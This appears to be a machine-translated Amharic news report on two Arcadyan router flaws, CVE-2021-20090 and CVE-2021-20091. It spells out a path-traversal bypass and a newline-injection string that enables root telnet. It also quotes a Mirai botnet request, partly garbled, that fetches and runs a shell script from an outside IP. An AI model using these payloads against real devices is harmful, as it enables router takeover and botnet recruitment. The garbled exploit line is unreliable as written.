በ 17 አምራቾች ላይ ተጽዕኖ የሚያሳድረው በቤት ራውተሮች ውስጥ ያለው ተጋላጭነት

በአርካዲያን ኩባንያ የኤችቲቲፒ አገልጋይ አተገባበርን በሚጠቀም የቤት ራውተሮች ላይ ከፍተኛ ጥቃት በአውታረ መረቡ ላይ ተመዝግቧል። በመሳሪያዎች ላይ ቁጥጥር ለማግኘት የዘፈቀደ ኮድ ከስር መብቶች ጋር የርቀት አፈፃፀምን የሚፈቅድ የሁለት ተጋላጭነቶች ጥምረት ጥቅም ላይ ይውላል። ችግሩ ከአርካዲያን፣ ASUS እና ከቡፋሎ የሚመጡ የ ADSL ራውተሮችን እንዲሁም በቢላይን ብራንዶች (ችግሩ በስማርት ቦክስ ፍላሽ የተረጋገጠ)፣ ዶይቸ ቴሌኮም፣ ብርቱካንማ፣ ኦ2፣ ቴሉስ፣ ቬሪዞን፣ ቮዳፎን እና የመሳሰሉትን መሳሪያዎች ይነካል። ሌሎች የቴሌኮም ኦፕሬተሮች. ችግሩ በ Arcadyan firmware ውስጥ ከ 10 ዓመታት በላይ እንደነበረ እና በዚህ ጊዜ ውስጥ ከ 20 የተለያዩ አምራቾች ወደ ቢያንስ 17 የመሳሪያ ሞዴሎች ለመሸጋገር መቻሉ ተጠቁሟል።

የመጀመሪያው ተጋላጭነት፣ CVE-2021-20090፣ ያለማረጋገጫ ማንኛውንም የድር በይነገጽ ስክሪፕት ማግኘት ያስችላል። የተጋላጭነቱ ፍሬ ነገር በድር በይነገጽ ውስጥ ምስሎች፣ CSS ፋይሎች እና የጃቫስክሪፕት ስክሪፕቶች የሚላኩባቸው አንዳንድ ማውጫዎች ያለ ማረጋገጫ ሊገኙ ይችላሉ። በዚህ አጋጣሚ ያለ ማረጋገጫ መዳረሻ የተፈቀደላቸው ማውጫዎች የመጀመሪያውን ጭንብል በመጠቀም ምልክት ይደረግባቸዋል። ወደ የወላጅ ማውጫ ለመሄድ በመንገዶች ላይ የ"../" ቁምፊዎችን መግለጽ በፋየርዌር ታግዷል፣ ነገር ግን "..%2f" ጥምርን መጠቀም ተዘሏል። ስለዚህ እንደ "http://192.168.1.1/images/..%2findex.htm" ያሉ ጥያቄዎችን ሲልኩ የተጠበቁ ገጾችን መክፈት ይቻላል.

ሁለተኛው ተጋላጭነት፣ CVE-2021-20091፣ የተረጋገጠ ተጠቃሚ በልዩ ሁኔታ የተቀረጹ መለኪያዎችን ወደ apply_abstract.cgi ስክሪፕት በመላክ በመሣሪያው የስርዓት ቅንጅቶች ላይ ለውጦችን እንዲያደርግ ያስችለዋል፣ ይህም በመለኪያዎቹ ውስጥ የአዲሱ መስመር ቁምፊ መኖሩን አያረጋግጥም። . ለምሳሌ የፒንግ ኦፕሬሽን ሲሰራ አጥቂው በሜዳው ውስጥ የአይፒ አድራሻው በሚረጋገጥበት ጊዜ “192.168.1.2%0AARC_SYS_TelnetdEnable=1” የሚለውን እና ስክሪፕቱን የቅንጅቶች ፋይል /tmp/etc/config/ ሲፈጥር መግለጽ ይችላል። .glbcfg፣ "AARC_SYS_TelnetdEnable=1" የሚለውን መስመር በውስጡ ይጽፋል፣ ይህም ቴሌኔትድ አገልጋይን የሚያንቀሳቅሰው፣ ይህም ያልተገደበ የትዕዛዝ ሼል መዳረሻ ከስር መብቶች ጋር ይሰጣል። በተመሳሳይ የAARC_SYS መለኪያን በማዘጋጀት በሲስተሙ ላይ ማንኛውንም ኮድ ማስፈጸም ይችላሉ። የመጀመሪያው ተጋላጭነት ችግር ያለበትን ስክሪፕት ያለማረጋገጫ ለማስኬድ ያስችለዋል እንደ “/images/..%2fapply_abstract.cgi” በመድረስ።

ተጋላጭነቶችን ለመጠቀም አጥቂ የድር በይነገጽ ወደሚሰራበት የአውታረ መረብ ወደብ ጥያቄ መላክ መቻል አለበት። በጥቃቱ መስፋፋት ተለዋዋጭነት በመመዘን ብዙ ኦፕሬተሮች በድጋፍ አገልግሎቱ የችግሮችን ምርመራ ለማቃለል ከውጫዊው አውታረመረብ ወደ መሳሪያዎቻቸው መዳረሻ ይተዋሉ። የበይነገጽ መዳረሻ በውስጣዊው አውታረመረብ ላይ ብቻ የተገደበ ከሆነ የ "ዲ ኤን ኤስ መልሶ ማቋቋም" ዘዴን በመጠቀም ከውጫዊ አውታረመረብ ጥቃት ሊፈጸም ይችላል. ድክመቶች ቀድሞውኑ ራውተሮችን ከ Mirai botnet ጋር ለማገናኘት በንቃት ጥቅም ላይ ይውላሉ፡POST/images/..%2fapply_abstract.cgi HTTP/1.1 ግንኙነት፡ የተጠጋ ተጠቃሚ-ወኪል፡ Dark action=start_ping&submit_button=ping.html& action_params=blink_time%3D5&ARC_212.192.241.7 0%1A ARC_SYS_TelnetdEnable=0&%212.192.241.72AARC_SYS_=cd+/tmp; wget+http://212.192.241.72/lolol.sh; curl+-O+http://777/loolol.sh; chmod+0+loolol.sh; sh+loolol.sh&ARC_ping_status=4&TMP_Ping_Type=XNUMX

ምንጭ: opennet.ru

አስተያየት ያክሉ